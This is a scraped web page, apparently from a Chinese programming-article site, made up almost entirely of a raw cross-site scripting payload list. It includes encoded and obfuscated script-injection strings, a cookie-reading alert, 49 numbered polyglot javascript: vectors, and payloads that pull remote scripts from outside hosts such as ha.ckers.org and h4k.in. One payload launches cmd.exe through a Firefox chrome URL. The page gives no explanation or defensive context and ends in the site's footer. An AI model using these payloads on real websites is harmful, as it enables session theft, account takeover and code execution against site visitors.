<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  Exploit String: <IMG SRC=javascript:alert(&quot;XSS&quot;)> 
'';!--"<script>alert(0);</script>=&{(alert(1))} 
<?xml version="1.0"?> <html:html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script> alert(document.cookie); </html:script> </html:html> 
<img src=`x` onrerror= ` ;; alert(1) ` /> 
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"> 
style=color: expression(alert(0));" a=" 
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))< 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> 
a=<a> <b> %3c%69%6d%67%2f%73%72%63%3d%31 %20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e </b> </a> document.write(unescape(a..b)) 
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"> <IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> <IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> 
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))> 
<IMG DYNSRC="javascript:alert('XSS');"> 
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> 
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser 
<IMG LOWSRC="javascript:alert('XSS');"> 
<IMG SRC=javascript:alert('XSS')> 
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> 
<IMG SRC="javascript:alert('XSS');"> 
<IMG SRC='vbscript:msgbox("XSS")'> 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> 
<A HREF="http://66.102.7.147/">XSS</A> 
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 
s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; 
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); 
s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; 
s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; 
s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; 
s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; 
<BR SIZE="&{alert('XSS')}"> 
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> 
%0da=eval;b=alert;a(b(/d/.source)); 
<a href = "javas cript :ale rt(1)">test 
+alert(0)+ 
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;; 
<body onload=a1={x:this.parent.document};a1.x.writeln(1);> 
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;; 
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> 
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS 
<IMG SRC="livescript:[code]"> 
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> 
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// 
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> 
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 
<A HREF="http://6&#09;6.000146.0x7.147/">XSS</A> 
<IMG SRC="mocha:[code]"> 
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" 
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" 
: _ = eval b=1 __ = location c=1 _ ( __ . hash // . substr (1) ) 
<IMGSRC="javascript:alert('XSS')"> 
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name  a=/ev///  .source a+=/al///  .source a[a] (name) 
a=/ev/ .source a+=/al/ .source,a = a[a] a(name) 
setTimeout// (name// ,0) 
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 
<SCRIPT SRC=http://ha.ckers.org/xss.js<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> 
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")> 
</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code> Exploit String: perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out

perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out 
<body onload=;;;;;;;;;;;_=alert;_(1);;;; 
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2= 0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7= 0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa rentNode;x.appendChild(i); <body <body onload=;;;;;al:eval('al'+'ert(1)');;><IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97; &#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41><IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28 &<WBR>#x27&#x58&#x53&#x53&#x27&#x29><IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058 &<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a; alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)<body/s/onload=x={doc:parent.document};x.doc.writeln(1)<body/」」$/onload=x={doc:parent[’document’]};x.doc.writeln(1) 
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>); 
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]: 0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/ s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/ s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]: 0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]: 0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a) o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</ 
 ___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)
 <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d); <A HREF="http://0102.0146.0007.00000223/">XSS</A><? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?><A HREF="//www.google.com/">XSS</A> Exploit String: <SCRIPT SRC=//ha.ckers.org/.j> 0%0d%0a%00<script src=//h4k.in>  s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1) '+''; u1=s1+s2+s3;URL=u1 <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><A HREF="http://google.com/">XSS</A><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 <SCRIPT>alert('XSS')</SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> Exploit String: a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))  a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
 eval.call(this,unescape.call(this,location)) d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))
 l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a _=eval,__=unescape,___=document.URL,_(__(___)) $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__) $=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($)) evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod) with(location)with(hash)eval(substring(1))<IMG SRC=" &#14; javascript:alert('XSS');"> Exploit String: <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--><STYLE TYPE="text/javascript">alert('XSS');</STYLE><style> body:after{ content: 「\61\6c\65\72\74\28\31\29″ } </style> <script> eval(eval(document.styleSheets[0].cssRules[0].style.content)) </script> Exploit String: <XSS STYLE="xss:expression(alert('XSS'))"><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><LINK REL="stylesheet" HREF="javascript:alert('XSS');"> }</style><script>a=eval;b=alert;a(b(/i/.source));</script>a=alert  A=alert;A(1)<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> Exploit String: <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE></textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' Exploit String: http://aa"><script>alert(123)</script>http://aa'><script>alert(123)</script>>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> http://aa<script>alert(123)</script>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> with(document.__parent__)alert(1) Exploit String: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> Exploit String: <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML><HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML><iframe%20src="javascript:alert(1)<a%20href="javascript:alert(1);<animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> <script>onerror=alert;throw 1337</script> <script>{onerror=alert}throw 1337</script> <script>throw onerror=alert,'some string',123,'haha'</script> <script>{onerror=eval}throw'=alert\x281337\x29'</script> <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> <script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script> <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>

 Javascript開頭

 1 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
 2 javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
 3 javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
 4 javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
 5 javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
 6 javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
 7 javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>
 8 javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>`
 9 javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>`
10 javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg"///*/ onload=alert()//</script>
11 javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script>
12 javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=alert()//</script>
13 javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=alert()//</script>
14 javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script>
15 javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script>
16 javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>--><<script>alert()<</script><frame/*/ onload=alert()//>
17 javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//<svg <frame */onload= alert()//</script>
18 javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()--><<svg/*/ onload=alert()//>
19 javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``>
20 javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]<<script>///<frame */ onload=alert()//<</script>
21 javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()><<svg/onload= /**/alert()//>
22 javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script><<script> /**/alert()//<</script><frame onload=alert()>
23 javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script>
24 javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script><svg/<frame/onload=alert()>
25 javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``><<svg/onload=alert()>
26 javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=alert()><svg/\"/*<svg onload=' /**/-alert()//'>javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script><<svg/onload= alert()//>
27 javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script>
28 javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script><<svg onload=alert()>
29 javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()>
30 javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script --><<script>alert()<</script>\ /**/alert()// 31 javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert()><frame/src=javascript:alert()>
32 javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script>
33 javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg <svg onload=alert()> alert()// 34 javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert()><script>alert()</script>
35 javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert()><frame src=javascript:alert()>
36 javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="<svg/onload=alert()>"><frame/onload=alert()>*/ alert()// 37 javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*<svg onload=alert()>*/ alert()//</script>
38 jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//<svg/onload=alert()><frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//>
39 javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>--><<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()>
40 javascript:alert()//\ /*<svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload=";alert();"></script>--><script>alert`;alert();`</script>*/alert()//\";alert()// 41 javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//--></template><frame/onload=alert() <img src=x onerror=alert()></style/</title/</textarea/</noscript/</noembed/</script><script>alert()</script>
42 javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert()//'-->\" alert();/*`/**/(/**/alert())//<script>alert()</script><<svg onload=alert()>>
43 javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()><svg/onload=alert(1)> alert()// 44 javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert();"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()><svg/onload=alert()> alert(1)// 45 javascript:alert()//<frame/src=javascript:alert()><svg/onload=alert()>`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert()>*/ alert()//*
46 javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\";alert()//";alert()//';alert()//<script>alert()</script><frame src="javascript:alert()">` alert()//<svg/onload=alert()>*/alert()/*
47 javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--
48 javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+alert()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+alert()//'>"><script>alert()</script><frame src="javascript:alert()"></frameset>+\"; alert()//<img src onerror=alert()>
49 javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)//
相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程